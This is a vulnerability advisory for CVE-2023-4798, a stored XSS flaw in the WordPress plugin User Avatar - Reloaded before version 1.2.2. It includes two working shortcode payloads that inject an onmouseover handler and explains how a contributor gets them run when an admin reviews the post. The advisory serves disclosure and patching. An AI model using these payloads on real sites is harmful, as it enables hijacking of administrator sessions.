Lucene search
Dmitrii IgnatyevWPEX-ID:273A95BF-39FE-4BA7-BC14-9527ACFD9F42HistorySep 25, 2023 - 12:00 a.m.
User Avatar - Reloaded < 1.2.2 - Contributor+ Stored XSS
2023-09-2500:00:00
Dmitrii Ignatyev
32
contributor+
stored xss
shortcode injection
admin reviewed
payload delivery
0.0004 Low
EPSS
Percentile
14.0%
Description The plugin does not properly sanitize and escape certain of its shortcodes attributes, which could allow relatively low-privileged users like contributors to conduct Stored XSS attacks.
As a Contributor+ create a new post and add one of the following shortcode.
[avatar user="admin" size="96" align="left" link='" onmouseover="alert(/XSS/)"' /]
[avatar user="admin" size="96" align="left" link="/" target='" onmouseover="alert(/XSS/)"' /]
Save it to be reviewed.
When an admin reviews the post and moves the mouse over the added code, the payload will be delivered.Related
wpvulndb
wpvulndb
User Avatar - Reloaded < 1.2.2 - Contributor+ Stored XSS
2023-09-25 00:00:00
prion
prion
Cross site scripting
2023-10-16 20:15:00
cve
cve
CVE-2023-4798
2023-10-16 20:15:16
cvelist
cvelist
CVE-2023-4798 User Avatar - Reloaded < 1.2.2 - Contributor+ Stored XSS
2023-10-16 19:39:09
nvd
nvd
CVE-2023-4798
2023-10-16 20:15:16
wordfence
wordfence